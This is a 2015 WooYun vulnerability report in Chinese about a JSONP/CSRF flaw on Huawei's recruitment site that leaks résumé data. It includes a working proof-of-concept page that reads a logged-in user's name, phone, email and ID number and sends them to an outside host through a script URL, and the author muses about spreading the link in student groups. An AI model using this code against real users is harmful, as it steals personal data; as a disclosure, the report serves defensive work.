当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129124

漏洞标题:华为某分站敏感信息泄露漏洞

相关厂商:华为技术有限公司

漏洞作者: Friday

提交时间:2015-07-28 14:49

修复时间:2015-09-11 16:22

公开时间:2015-09-11 16:22

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-28: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-08-07: 细节向核心白帽子及相关领域专家公开
2015-08-17: 细节向普通白帽子公开
2015-08-27: 细节向实习白帽子公开
2015-09-11: 细节向公众公开

简要描述:

华为某分站敏感信息泄露漏洞,和JSONP一个原理

详细说明:

URL:
https://career.huawei.com/recruitment/servlet/getHeaderInfo
https://career.huawei.com/recruitment/servlet/getUserResumeInfo
华为招聘,在登录系统之后,会向服务器发出两个AJAX请求,分别是请求账户信息,简历信息。但是在请求的时候没有添加验证(Token或referer),导致可被CSRF,即黑客可以通过给用户发送一个链接,用户在登录了华为招聘的网站的情况下(浏览器开启之后,登录过即可,不需要保证窗口开启),点击该链接,就会导致自己的敏感信息泄露,包括身份证,学校,专业等(简历中有的都会被泄露。)
测试链接:http://friday.sinaapp.com/huawei.html
代码:

<meta charset="utf-8">
<table id="info_table" style="width: 1000px;margin: 100 auto;" border="1">
<tr><td>系统正在请求数据,请耐心等待!</td></tr>

</table>
<div id="submit" style="width: 1000px;margin: 100 auto;display: none">
<input type="submit" value="确认提交" onclick="alert('已成功提交,请耐心等待!');window.close()"/>
</div>
<script type="text/javascript">
table = document.getElementById("info_table")
setTimeout(function(){
if(statu == 0){
table.innerHTML = "<tr><td style='color:red'>检测到您尚未登录!点击跳转:<a href='https://career.huawei.com/recruitment/'>华为招聘</a></td></tr>"
}
},5000);
</script>
<script src="http://career.huawei.com/recruitment/servlet/getUserResumeInfo"></script>
<script type="text/javascript">
table = document.getElementById("info_table")
statu = 0
if( JSON.stringify(resume).length > 1000 ){
alert("你好,请先确认信息是否正确!\n")
str = "<tr><td>姓名:</td><td>"+resume.name+"</td><td>专业:</td><td>"+resume.firstMajor+"</td></tr><tr><td>手机:</td><td>"+resume.mobilePhone+"</td><td>国籍:</td><td>"+resume.nationality+"</td></tr><tr><td>学校:</td><td>"+resume.establishment+"</td><td>邮箱:</td><td>"+resume.email+"</td></tr><tr><td>身份证号</td><td>"+resume.indentifiedId+"</td></tr>"
table.innerHTML = str
document.getElementById("submit").style.display = 'block'
statu = 1
var script = document.createElement('script')
script.src = 'http://friday.sinaapp.com/hack.js?resume='+resume.name+'_'+resume.firstMajor+'_'+resume.mobilePhone+'_'+resume.establishment+'_'+resume.email+'_'+resume.indentifiedId
document.body.appendChild(script)
}
</script>

漏洞证明:

点击URL后,如果招聘网是登录状态:

QQ图片20150724232331.png


测试代码中,将敏感信息发送到了远程服务器,日志信息如下:

QQ图片20150724231344.png


URL解码后即可获得详细信息.
华为招聘那么多学生,随便扔个链接到招聘群= =估计中招的会有很多吧。。。
不过卤煮胆子小= =还是算了。。。

修复方案:

在返回信息的时候,验证refer/token
华为大厂,求高rank~求礼物~

版权声明:转载请注明来源 Friday@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-28 16:21

厂商回复:

非常感谢Friday提交的漏洞,我们已经将这个漏洞通知了业务部门,他们将会尽快修复这个漏洞。

最新状态:

暂无